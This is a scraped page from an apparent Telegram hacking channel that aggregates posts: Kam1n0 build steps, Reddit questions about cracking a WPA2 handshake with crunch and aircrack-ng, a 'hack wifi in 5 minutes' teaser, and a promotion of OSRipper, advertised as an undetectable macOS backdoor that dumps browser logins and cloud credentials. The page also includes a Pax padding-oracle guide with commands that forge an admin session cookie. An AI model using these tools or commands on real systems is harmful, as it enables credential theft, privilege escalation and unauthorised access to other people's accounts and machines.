Hacking Articles Tips Tricks Videos Tutorials
468 subscribers
65.8K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
Hacking Articles Tips Tricks Videos Tutorials
optional if the server does not have to deal with any disassembling. In other words, the client side uses the Kam1n0 plugin for IDA Pro. It is strongly suggested to have the IDA Pro installed with the Kam1n0 server. Kam1n0 server will automatically detect…
/github.com/McGill-DMaS/Kam1n0-Community Importing the project.IntelliJ: Import the root /kam1n0/kam1n0/ as a maven project. All the submodules will be loaded accordingly. EclipseEE: Add the cloned git repository to the git view. Import all maven projects from the git repository. You may need to modify the classpath to address any error. All the resources path are dynamically modified when running inside an IDE (through the kam1n0-resources submodule).

To build the project:

cd /kam1n0/kam1n0
mvn -DskipTests clean package
mvn -DskipTests package

The resulting binaries can be found in /kam1n0/build-bins/

To run the test code, you will need to first download chromedriver.exefrom http://chromedriver.chromium.org/ and add its absolute path into an environment variable named webdriver.chrome.driver. It is also required that there is a chrome browser installed in the system. The test code will launch a browser instance to test the UI interfaces. The complete testing procedure will take approximately 3 hours.

cd /kam1n0/kam1n0
mvn -DskipTests clean package # you can skip this one if you already built the package
mvn -DskipTests package # you can skip this one if you already built the package
mvn -DforkMode=never test

These commands only compiles java with pre-compiled wheels of libvex and z3. It works out-of-the-box. The build of libvex and z3 is platform-dependent. We use a fork of libvex from Angr. More serious build scripts as well as installers for windows/linux can be found under /kam1n0-builds/

* kam1n0: The server’s source code.
* kam1n0-builds: Installer source code and scripts to build the distribution.
* kam1n0-clients: The clients’ source code. Binary ReleasesWe have a Jenkin server for contineous development and delivery. Latest stable release will be posted here. Periodically we will synchronize our internal experimental branch with this repository. Download
hacking: security in practice
Watchdogs 2 Modification

Looking for c++ devs to achieve a multiplayer modification to Watchdogs 2 similar to how San Andreas Multiplayer was achieved, contact me on discord SkyFlare#6771 if youre knowledgeable or have information or resources thatll be beneficial

submitted by /u/PDBMHH
[link] [comments]
hacking: security in practice
Generate wordlist with crunch

So I wanted to brutforce a WPA2 handshake with aircrack-ng. But a wordlist seems to be mandatory. I found crunch to generate it, but can’t find a way to generate a simple list of alphanumerical (lowercase, uppercase and number) of max length of 10.

I tried

crunch 10 10 "abcdefghijklmnopqrstuvwxyz123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ" > crunchPwd.txt

or even

crunch 10 10 "@,%" > crunchPwd.txt

Any idea?

submitted by /u/Tyranoc4
[link] [comments]
Escalating SSTI to Reflected XSS using curly braces { }

SSTI -> Self XSS -> RXSSContinue reading on Medium »
Read more...
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
How to hack wifi Password in 5 minutes

https://cdn-images-1.medium.com/max/1280/1*nW_GoevdMaOTDPk7a5V7Tg.png
In this blog I am going to show you how to hack wifi password on windows 10 in 5 minutes. It is very easy just follow these steps to hack…

Continue reading on Medium »
Kali Linux Tutorials
OSRipper : AV Evading OSX Backdoor And Crypter Framework

OSripper is a fully undetectable Backdoor generator and Crypter which specialises in OSX M1 malware. It will also work on windows but for now there is no support for it and it IS NOT FUD for windows (yet at least) and for now i will not focus on windows.

You can also PM me on discord for support or to ask for new features SubGlitch1#2983

Features

* FUD (for macOS)
* Cloacks as an official app (Microsoft, ExpressVPN etc)
* Dumps; Sys info, Browser History, Logins, ssh/aws/azure/gcloud creds, clipboard content, local users etc. (more on Cedric Owens swiftbelt)
* Encrypted communications
* Rootkit-like Behaviour
* Every Backdoor generated is entirely unique
* ngrok support

Description

Please check the wiki for information on how OSRipper functions (which changes extremely frequently)

Getting Started

Dependencies

You need python. If you do not wish to download python you can download a compiled release. The python dependencies are specified in the requirements.txt file.

Since Version 1.4 you will need metasploit installed and on path so that it can handle the meterpreter listeners.

Installing

Linux

apt install git python -y
git clone https://github.com/SubGlitch1/OSRipper.git
cd OSRipper
sudo python3 setup.py

Windows

git clone https://github.com/SubGlitch1/OSRipper.git
cd OSRipper
sudo python3 setup.py

or download the latest release from https://github.com/SubGlitch1/OSRipper/releases/tag/v0.2.3

Executing program

Only this

sudo python3 main.py
Download
hacking: security in practice
In todays world I dont see how social engineering even works?!?

It seems like most people are too smart for phsishing and other form of social engineering. Is anyone still buying into scareware? Unless they are elderly and clueless. I mean who just clicks on links or uses unknown things nowadays. Especially with 2 step authentication. Spear phishing is the only possibly I am thinking. Thoughts?

I have no tech background. I am looking into this and most of my friends of all ages(excuduling people 70 and over who truly dont understand) know not to click on links and stuff like this.

submitted by /u/UnableBug8111
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
Exploit padding oracles for fun and profit!Pax (PAdding oracle (https://www.kitploit.com/search/label/Oracle) eXploiter) is a tool for exploiting (https://www.kitploit.com/search/label/Exploiting) padding oracles in order to:Obtain plaintext for a given piece of CBC (https://www.kitploit.com/search/label/CBC) encrypted data.Obtain encrypted bytes for a given piece of plaintext, using the unknown encryption (https://www.kitploit.com/search/label/Encryption) algorithm used by the oracle.This can be used to disclose encrypted session information, and often to bypass authentication, elevate privileges and to execute code remotely by encrypting custom plaintext and writing it back to the server.As always, this tool should only be used on systems you own and/or have permission to probe!
InstallationDownload from releases (https://github.com/liamg/pax/releases), or install with Go:go get -u github.com/liamg/pax/cmd/paxExample UsageIf you find a suspected oracle, where the encrypted data is stored inside a cookie (https://www.kitploit.com/search/label/Cookie) named SESS, you can use the following:pax decrypt --url https://target.site/profile.php --sample Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D --block-size 16 --cookies "SESS=Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D"This will hopefully give you some plaintext, perhaps something like: {"user_id": 456, "is_admin": false}It looks like you could elevate your privileges here!You can attempt to do so by first generating your own encrypted data that the oracle will decrypt back to some sneaky plaintext:pax encrypt --url https://target.site/profile.php --sample Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D --block-size 16 --cookies "SESS=Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D" --plain-text '{"user_id": 456, "is_admin": true}'This will spit out another base64 encoded set of encrypted data, perhaps something like:dGhpcyBpcyBqdXN0IGFuIGV4YW1wbGU=
Now you can open your browser and set the value of the SESS cookie to the above value. Loading the original oracle page, you should now see you are elevated to admin level.How does this work?The following are great guides on how this attack works:https://robertheaton.com/2013/07/29/padding-oracle-attack/https://blog.skullsecurity.org/2013/padding-oracle-attacks-in-depth

Download Pax (https://github.com/liamg/pax)

___________________________
@hacking_Attack
@Hacking_Video